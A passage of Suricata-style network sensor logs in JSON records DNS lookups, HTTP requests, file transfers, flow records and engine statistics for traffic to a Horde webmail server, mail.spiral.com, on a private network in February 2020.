{"timestamp":"2020-02-29T00:11:42.767232+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17983,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:42.798805+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":6}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:42.947886+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710}} 
{"timestamp":"2020-02-29T00:11:43.000367+0000","flow_id":446408885986074,"event_type":"flow","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:42.582426+0000","end":"2020-02-29T00:06:42.690395+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:43.012531+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23757,"tx_id":7}} {"timestamp":"2020-02-29T00:11:43.014870+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} 
{"timestamp":"2020-02-29T00:11:43.015159+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:11:43.017305+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:11:43.047974+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":8}} {"timestamp":"2020-02-29T00:11:43.048269+0000","flow_id":1202052566297535,"event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:11:43.053234+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":5}} 
{"timestamp":"2020-02-29T00:11:43.053530+0000","flow_id":150206485572827,"event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:11:43.160141+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:11:44.693232+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":2}} 
{"timestamp":"2020-02-29T00:11:44.702093+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34802,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:11:45.000458+0000","flow_id":760048888043704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":2742,"bytes_toclient":7539,"start":"2020-02-29T00:10:35.055480+0000","end":"2020-02-29T00:10:44.624902+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:45.362391+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34804,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":22784,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:48.000224+0000","event_type":"stats","stats":{"uptime":14360,"capture":{"kernel_packets":134854,"kernel_drops":0},"decoder":{"pkts":134874,"bytes":92994340,"invalid":185,"ipv4":133387,"ipv6":8,"ethernet":134874,"raw":0,"null":0,"sll":0,"tcp":128131,"udp":5056,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2753,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2769,"synack":2760,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1794,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2309,"failed_udp":111},"tx":{"http":4621,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2388}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2354,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22485,"memcap_state":0,"memcap_global":0},"http":{"memuse":72030,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:48.160966+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":0}} {"timestamp":"2020-02-29T00:11:48.199209+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:11:49.000760+0000","flow_id":1668915492608187,"event_type":"flow","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:48.579771+0000","end":"2020-02-29T00:06:48.688271+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:11:52.834518+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":0}} {"timestamp":"2020-02-29T00:11:52.846418+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:11:54.000928+0000","flow_id":397725432354945,"event_type":"flow","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:53.530561+0000","end":"2020-02-29T00:06:53.639563+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:55.000261+0000","event_type":"stats","stats":{"uptime":14367,"capture":{"kernel_packets":134889,"kernel_drops":0},"decoder":{"pkts":134892,"bytes":92999998,"invalid":186,"ipv4":133405,"ipv6":8,"ethernet":134892,"raw":0,"null":0,"sll":0,"tcp":128144,"udp":5060,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2311,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2390}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2355,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":
65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22483,"memcap_state":0,"memcap_global":0},"http":{"memuse":59670,"memcap":0}}} {"timestamp":"2020-02-29T00:11:55.000994+0000","flow_id":1133320201266640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":35958,"start":"2020-02-29T00:10:43.157136+0000","end":"2020-02-29T00:10:54.388286+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:55.001212+0000","flow_id":1058609245547071,"event_type":"flow","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1178,"bytes_toclient":824,"start":"2020-02-29T00:10:49.092735+0000","end":"2020-02-29T00:10:54.388780+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:57.953842+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56955,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:58.000468+0000","flow_id":459856429493109,"event_type":"flow","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:56.895861+0000","end":"2020-02-29T00:06:57.004740+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:58.072837+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56956,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:12:01.000422+0000","flow_id":463232274070173,"event_type":"flow","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.719517+0000","end":"2020-02-29T00:07:00.828093+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:01.000669+0000","flow_id":339717604553391,"event_type":"flow","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.242351+0000","end":"2020-02-29T00:07:00.351112+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:02.000188+0000","event_type":"stats","stats":{"uptime":14374,"capture":{"kernel_packets":134895,"kernel_drops":0},"decoder":{"pkts":134904,"bytes":93002988,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134904,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_l
